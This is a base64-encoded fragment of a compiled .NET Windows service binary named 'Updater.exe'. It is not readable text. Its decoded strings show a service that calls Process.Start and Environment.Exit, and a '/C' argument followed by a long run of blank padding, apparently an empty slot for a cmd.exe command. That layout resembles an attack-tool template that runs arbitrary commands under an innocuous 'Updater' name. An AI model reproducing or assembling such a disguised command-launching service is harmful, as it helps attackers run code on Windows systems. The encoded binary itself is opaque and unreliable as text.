fAgoA/QJaAA4ACQNoAAoAEwNaAA4ALwNpAgoATgM9AwoAWwNaAAAAAAABAAAAAAABAAEAAQAQABYAHwAFAAEAAQCAARAAJwAfAAkAAgAGAAEAiQATAFAgAAAAAMQAlAAXAAEAbyAAAAAAgQCcABwAAgCMIAAAAACGGLAAHAACAJwgAAAAAMQAtgAgAAIA0CAAAAAAxAC+ABwAAwDUIAAAAACRAMUAJgADAAAAAQDKAAAAAQDUACEAsAAqACkAsAAqADEAsAAqADkAsAAqAEEAsAAqAEkAsAAqAFEAsAAqAFkAsAAqAGEAsAAXAGkAsAAqAHEAsAAqAHkAsAAqAIEAsAAqAIkAsAAvAJkAsAA1AKEAsAAcAKkAlAAcAAkAlAAXALEAsAAcALkAGgM6AAkAHwMqAAkAsAAcAMEANwM+AMkAVQNFANEAZwNFAAkAbANOAC4ACwBeAC4AEwBrAC4AGwBrAC4AIwBrAC4AKwBeAC4AMwBxAC4AOwBrAC4ASwBrAC4AUwCJAC4AYwCzAC4AawDAAC4AcwAmAS4AewAvAS4AgwA4AUoAVQAEgAAAAQAAAAAAAAAAAAAAAAAfAAAABAAAAAAAAAAAAAAAAQAvAAAAAAAEAAAAAAAAAAAAAAAKAFEAAAAAAAQAAAAAAAAAAAAAAAoAWgAAAAAAAAAAAAA8TW9kdWxlPgBVcGRhdGVyLmV4ZQBTZXJ2aWNlMQBVcGRhdGVyAFByb2dyYW0AU3lzdGVtLlNlcnZpY2VQcm9jZXNzAFNlcnZpY2VCYXNlAG1zY29ybGliAFN5c3RlbQBPYmplY3QAU3lzdGVtLkNvbXBvbmVudE1vZGVsAElDb250YWluZXIAY29tcG9uZW50cwBEaXNwb3NlAEluaXRpYWxpemVDb21wb25lbnQALmN0b3IAT25TdGFydABPblN0b3AATWFpbgBkaXNwb3NpbmcAYXJncwBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlDdWx0dXJlQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLkRpYWdub3N0aWNzAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnaW5nTW9kZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAElEaXNwb3NhYmxlAENvbnRhaW5lcgBTdHJpbmcAVHJpbQBzZXRfU2VydmljZU5hbWUAUHJvY2VzcwBTdGFydABTeXN0ZW0uVGhyZWFkaW5nAFRocmVhZABTbGVlcABFbnZpcm9ubWVudABFeGl0AFJ1bgAARUEAQQBBACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAL/3LwBDACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC